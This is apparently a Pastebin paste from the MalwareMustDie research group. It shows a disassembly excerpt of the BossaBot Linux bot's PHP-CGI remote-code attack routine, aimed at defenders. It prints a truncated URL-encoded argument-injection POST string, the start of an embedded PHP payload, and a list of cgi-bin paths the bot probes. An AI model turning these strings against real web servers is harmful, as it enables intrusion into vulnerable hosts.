API tools faq
paste
Advertisement
MalwareMustDie

Redundant dirs for RFI attack BossaBot #Malwaremustdie!

MalwareMustDie
Sep 8th, 2014
3,135
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 10.01 KB | None | 0 0
raw download clone embed print report
  1. // Malwaremustdie!
  2. // redundant attack RFI by BossaBot
  3.  
  4.    :
  5. .text:0x80049B58 push ebp
  6. .text:0x80049B59 mov ebp, esp
  7. .text:0x80049B5B push edi
  8. .text:0x80049B5C push esi
  9. .text:0x80049B5D push ebx
  10. .text:0x80049B5E mov eax, offset aPostS?2d64616c ; "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%"...
  11. .text:0x80049B63 sub esp, 0AE8h ; Integer Subtraction
  12. .text:0x80049B69 cld ; Clear Direction Flag
  13. .text:0x80049B6A mov esi, eax
  14. .text:0x80049B6C mov ecx, 125h
  15. .text:0x80049B71 lea edi, [ebp+var_4B8] ; Load Effective Address
  16. .text:0x80049B77 rep movsd ; Move Byte(s) from String to String
  17. .text:0x80049B79 mov eax, offset a?phpTmpSys_get ; "<?php\n$tmp = sys_get_temp_dir();\n$path "...
  18. .text:0x80049B7E movsb ; Move Byte(s) from String to String
  19. .text:0x80049B7F mov ecx, 63h
  20. .text:0x80049B84 mov esi, eax
  21. .text:0x80049B86 lea edi, [ebp+var_648] ; Load Effective Address
  22. .text:0x80049B8C rep movsd ; Move Byte(s) from String to String
  23. .text:0x80049B8E movsw ; Move Byte(s) from String to String
  24. .text:0x80049B90 movsb ; Move Byte(s) from String to String
  25. .text:0x80049B91 push [ebp+size] ; size
  26. .text:0x80049B94 call _gethostbyname ; Call Procedure
  27. .text:0x80049B99 mov ds:dword_0x8051B00, eax
  28. .text:0x80049B9E mov [esp+0AF8h+var_AF8], 0Dh
  29. .text:0x80049BA5 call _malloc ; Call Procedure
  30. .text:0x80049BAA add esp, 10h ; Add
  31. .text:0x80049BAD test eax, eax ; Logical Compare
  32. .text:0x80049BAF jz short loc_0x8049BC2 ; Jump if Zero (ZF=1)
  33. .text:0x80049BB1 push ecx
  34. .text:0x80049BB2 push 0Dh ; size_t
  35. .text:0x80049BB4 push offset aCgiBinPhp ; "/cgi-bin/php"
  36. .text:0x80049BB9 push eax ; void *
  37. .text:0x80049BBA call _memcpy ; Call Procedure
  38. .text:0x80049BBF add esp, 10h ; Add
  39. .text:0x80049BC2
  40. .text:0x80049BC2 loc_0x8049BC2: ; cod xref:: sub_0x8049B58+57
  41. .text:0x80049BC2 sub esp, 0Ch ; Integer Subtraction
  42. .text:0x80049BC5 push 0Eh ; size
  43. .text:0x80049BC7 mov [ebp+var_AA8], eax
  44. .text:0x80049BCD call _malloc ; Call Procedure
  45. .text:0x80049BD2 add esp, 10h ; Add
  46. .text:0x80049BD5 test eax, eax ; Logical Compare
  47. .text:0x80049BD7 jz short loc_0x8049BEA ; Jump if Zero (ZF=1)
  48. .text:0x80049BD9 push edx
  49. .text:0x80049BDA push 0Eh ; size_t
  50. .text:0x80049BDC push offset aCgiBinPhp5 ; "/cgi-bin/php5"
  51. .text:0x80049BE1 push eax ; void *
  52. .text:0x80049BE2 call _memcpy ; Call Procedure
  53. .text:0x80049BE7 add esp, 10h ; Add
  54. .text:0x80049BEA
  55. .text:0x80049BEA loc_0x8049BEA: ; cod xref:: sub_0x8049B58+7F
  56. .text:0x80049BEA sub esp, 0Ch ; Integer Subtraction
  57. .text:0x80049BED push 11h ; size
  58. .text:0x80049BEF mov [ebp+var_AA4], eax
  59. .text:0x80049BF5 call _malloc ; Call Procedure
  60. .text:0x80049BFA add esp, 10h ; Add
  61. .text:0x80049BFD test eax, eax ; Logical Compare
  62. .text:0x80049BFF jz short loc_0x8049C12 ; Jump if Zero (ZF=1)
  63. .text:0x80049C01 push edi
  64. .text:0x80049C02 push 11h ; size_t
  65. .text:0x80049C04 push offset aCgiBinPhpCgi ; "/cgi-bin/php-cgi"
  66. .text:0x80049C09 push eax ; void *
  67. .text:0x80049C0A call _memcpy ; Call Procedure
  68. .text:0x80049C0F add esp, 10h ; Add
  69. .text:0x80049C12
  70. .text:0x80049C12 loc_0x8049C12: ; cod xref:: sub_0x8049B58+A7
  71. .text:0x80049C12 sub esp, 0Ch ; Integer Subtraction
  72. .text:0x80049C15 push 11h ; size
  73. .text:0x80049C17 mov [ebp+var_AA0], eax
  74. .text:0x80049C1D call _malloc ; Call Procedure
  75. .text:0x80049C22 add esp, 10h ; Add
  76. .text:0x80049C25 test eax, eax ; Logical Compare
  77. .text:0x80049C27 jz short loc_0x8049C3A ; Jump if Zero (ZF=1)
  78. .text:0x80049C29 push esi
  79. .text:0x80049C2A push 11h ; size_t
  80. .text:0x80049C2C push offset aCgiBinPhp_cgi ; "/cgi-bin/php.cgi"
  81. .text:0x80049C31 push eax ; void *
  82. .text:0x80049C32 call _memcpy ; Call Procedure
  83. .text:0x80049C37 add esp, 10h ; Add
  84. .text:0x80049C3A
  85. .text:0x80049C3A loc_0x8049C3A: ; cod xref:: sub_0x8049B58+CF
  86. .text:0x80049C3A sub esp, 0Ch ; Integer Subtraction
  87. .text:0x80049C3D push 0Eh ; size
  88. .text:0x80049C3F mov [ebp+var_A9C], eax
  89. .text:0x80049C45 call _malloc ; Call Procedure
  90. .text:0x80049C4A add esp, 10h ; Add
  91. .text:0x80049C4D test eax, eax ; Logical Compare
  92. .text:0x80049C4F jz short loc_0x8049C62 ; Jump if Zero (ZF=1)
  93. .text:0x80049C51 push ebx
  94. .text:0x80049C52 push 0Eh ; size_t
  95. .text:0x80049C54 push offset aCgiBinPhp4 ; "/cgi-bin/php4"
  96. .text:0x80049C59 push eax ; void *
  97. .text:0x80049C5A call _memcpy ; Call Procedure
  98. .text:0x80049C5F add esp, 10h ; Add
  99. .text:0x80049C62
  100. .text:0x80049C62 loc_0x8049C62: ; cod xref:: sub_0x8049B58+F7
  101. .text:0x80049C62 sub esp, 0Ch ; Integer Subtraction
  102. .text:0x80049C65 push 12h ; size
  103. .text:0x80049C67 mov [ebp+var_A98], eax
  104. .text:0x80049C6D call _malloc ; Call Procedure
  105. .text:0x80049C72 add esp, 10h ; Add
  106. .text:0x80049C75 test eax, eax ; Logical Compare
  107. .text:0x80049C77 jz short loc_0x8049C8A ; Jump if Zero (ZF=1)
  108. .text:0x80049C79 push ecx
  109. .text:0x80049C7A push 12h ; size_t
  110. .text:0x80049C7C push offset aCgiBinPhp5Cgi ; "/cgi-bin/php5-cgi"
  111. .text:0x80049C81 push eax ; void *
  112. .text:0x80049C82 call _memcpy ; Call Procedure
  113. .text:0x80049C87 add esp, 10h ; Add
  114. .text:0x80049C8A
  115. .text:0x80049C8A loc_0x8049C8A: ; cod xref:: sub_0x8049B58+11F
  116. .text:0x80049C8A sub esp, 0Ch ; Integer Subtraction
  117. .text:0x80049C8D push 12h ; size
  118. .text:0x80049C8F mov [ebp+var_A94], eax
  119. .text:0x80049C95 call _malloc ; Call Procedure
  120. .text:0x80049C9A add esp, 10h ; Add
  121. .text:0x80049C9D test eax, eax ; Logical Compare
  122. .text:0x80049C9F jz short loc_0x8049CB2 ; Jump if Zero (ZF=1)
  123. .text:0x80049CA1 push edx
  124. .text:0x80049CA2 push 12h ; size_t
  125. .text:0x80049CA4 push offset aCgiBinPhp4Cgi ; "/cgi-bin/php4-cgi"
  126. .text:0x80049CA9 push eax ; void *
  127. .text:0x80049CAA call _memcpy ; Call Procedure
  128. .text:0x80049CAF add esp, 10h ; Add
  129. .text:0x80049CB2
  130. .text:0x80049CB2 loc_0x8049CB2: ; cod xref:: sub_0x8049B58+147
  131. .text:0x80049CB2 sub esp, 0Ch ; Integer Subtraction
  132. .text:0x80049CB5 push 12h ; size
  133. .text:0x80049CB7 mov [ebp+var_A90], eax
  134. .text:0x80049CBD call _malloc ; Call Procedure
  135. .text:0x80049CC2 add esp, 10h ; Add
  136. .text:0x80049CC5 test eax, eax ; Logical Compare
  137. .text:0x80049CC7 jz short loc_0x8049CDA ; Jump if Zero (ZF=1)
  138. .text:0x80049CC9 push edi
  139. .text:0x80049CCA push 12h ; size_t
  140. .text:0x80049CCC push offset aCgiBinPhp5_cgi ; "/cgi-bin/php5.cgi"
  141. .text:0x80049CD1 push eax ; void *
  142. .text:0x80049CD2 call _memcpy ; Call Procedure
  143. .text:0x80049CD7 add esp, 10h ; Add
  144. .text:0x80049CDA
  145. .text:0x80049CDA loc_0x8049CDA: ; cod xref:: sub_0x8049B58+16F
  146. .text:0x80049CDA sub esp, 0Ch ; Integer Subtraction
  147. .text:0x80049CDD push 12h ; size
  148. .text:0x80049CDF mov [ebp+var_A8C], eax
  149. .text:0x80049CE5 call _malloc ; Call Procedure
  150. .text:0x80049CEA add esp, 10h ; Add
  151. .text:0x80049CED test eax, eax ; Logical Compare
  152. .text:0x80049CEF jz short loc_0x8049D02 ; Jump if Zero (ZF=1)
  153. .text:0x80049CF1 push esi
  154. .text:0x80049CF2 push 12h ; size_t
  155. .text:0x80049CF4 push offset aCgiBinPhp4_cgi ; "/cgi-bin/php4.cgi"
  156. .text:0x80049CF9 push eax ; void *
  157. .text:0x80049CFA call _memcpy ; Call Procedure
  158. .text:0x80049CFF add esp, 10h ; Add
  159. .text:0x80049D02
  160. .text:0x80049D02 loc_0x8049D02: ; cod xref:: sub_0x8049B58+197
  161. .text:0x80049D02 sub esp, 0Ch ; Integer Subtraction
  162. .text:0x80049D05 push 13h ; size
  163. .text:0x80049D07 mov [ebp+var_A88], eax
  164. .text:0x80049D0D call _malloc ; Call Procedure
  165. .text:0x80049D12 add esp, 10h ; Add
  166. .text:0x80049D15 test eax, eax ; Logical Compare
  167. .text:0x80049D17 jz short loc_0x8049D2A ; Jump if Zero (ZF=1)
  168. .text:0x80049D19 push ebx
  169. .text:0x80049D1A push 13h ; size_t
  170. .text:0x80049D1C push offset aCgiBinPhp52_cg ; "/cgi-bin/php52.cgi"
  171. .text:0x80049D21 push eax ; void *
  172. .text:0x80049D22 call _memcpy ; Call Procedure
  173. .text:0x80049D27 add esp, 10h ; Add
  174. .text:0x80049D2A
  175. .text:0x80049D2A loc_0x8049D2A: ; cod xref:: sub_0x8049B58+1BF
  176. .text:0x80049D2A sub esp, 0Ch ; Integer Subtraction
  177. .text:0x80049D2D push 13h ; size
  178. .text:0x80049D2F mov [ebp+var_A84], eax
  179. .text:0x80049D35 call _malloc ; Call Procedure
  180. .text:0x80049D3A add esp, 10h ; Add
  181. .text:0x80049D3D test eax, eax ; Logical Compare
  182. .text:0x80049D3F jz short loc_0x8049D52 ; Jump if Zero (ZF=1)
  183. .text:0x80049D41 push ecx
  184. .text:0x80049D42 push 13h ; size_t
  185. .text:0x80049D44 push offset aCgiBinPhp53_cg ; "/cgi-bin/php53.cgi"
  186. .text:0x80049D49 push eax ; void *
  187. .text:0x80049D4A call _memcpy ; Call Procedure
  188. .text:0x80049D4F add esp, 10h ; Add
  189. .text:0x80049D52
  190. .text:0x80049D52 loc_0x8049D52: ; cod xref:: sub_0x8049B58+1E7
  191. .text:0x80049D52 sub esp, 0Ch ; Integer Subtraction
  192. .text:0x80049D55 push 0Ah ; size
  193. .text:0x80049D57 mov [ebp+var_A80], eax
  194. .text:0x80049D5D call _malloc ; Call Procedure
  195. .text:0x80049D62 add esp, 10h ; Add
  196. .text:0x80049D65 test eax, eax ; Logical Compare
  197. .text:0x80049D67 jz short loc_0x8049D7A ; Jump if Zero (ZF=1)
  198. .text:0x80049D69 push edx
  199. .text:0x80049D6A push 0Ah ; size_t
  200. .text:0x80049D6C push offset aCgiBin ; "/cgi-bin/"
  201. .text:0x80049D71 push eax ; void *
  202. .text:0x80049D72 call _memcpy ; Call Procedure
  203. .text:0x80049D77 add esp, 10h ; Add
  204. .text:0x80049D7A
  205. .text:0x80049D7A loc_0x8049D7A: ; cod xref:: sub_0x8049B58+20F
  206. .text:0x80049D7A sub esp, 0Ch ; Integer Subtraction
  207. .text:0x80049D7D push 11h ; size
  208. .text:0x80049D7F mov [ebp+var_A7C], eax
  209. .text:0x80049D85 call _malloc ; Call Procedure
  210. .text:0x80049D8A add esp, 10h ; Add
  211. .text:0x80049D8D test eax, eax ; Logical Compare
  212. .text:0x80049D8F jz short loc_0x8049DA2 ; Jump if Zero (ZF=1)
  213. .text:0x80049D91 push edi
  214. .text:0x80049D92 push 11h ; size_t
  215. .text:0x80049D94 push offset aCgiSysPhpCgi ; "/cgi-sys/php-cgi"
  216. .text:0x80049D99 push eax ; void *
  217. .text:0x80049D9A call _memcpy ; Call Procedure
  218. .text:0x80049D9F add esp, 10h ; Add
  219. .text:0x80049DA2
  220. .text:0x80049DA2 loc_0x8049DA2: ; cod xref:: sub_0x8049B58+237
  221. .text:0x80049DA2 sub esp, 0Ch ; Integer Subtraction
  222. .text:0x80049DA5 push 2 ; size
  223. .text:0x80049DA7 mov [ebp+var_A78], eax
  224. .text:0x80049DAD call _malloc ; Call Procedure
  225. .text:0x80049DB2 add esp, 10h ; Add
  226. .text:0x80049DB5 test eax, eax ; Logical Compare
  227. .text:0x80049DB7 jz short loc_0x8049DCA ; Jump if Zero (ZF=1)
  228. .text:0x80049DB9 push esi
  229. .text:0x80049DBA push 2 ; size_t
  230. .text:0x80049DBC push 804DF2Bh ; void *
  231. .text:0x80049DC1 push eax ; void *
  232. .text:0x80049DC2 call _memcpy ; Call Procedure
  233. .text:0x80049DC7 add esp, 10h ; Add
  234.         :
  235.  
  236. ;;---------
  237. ;; #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!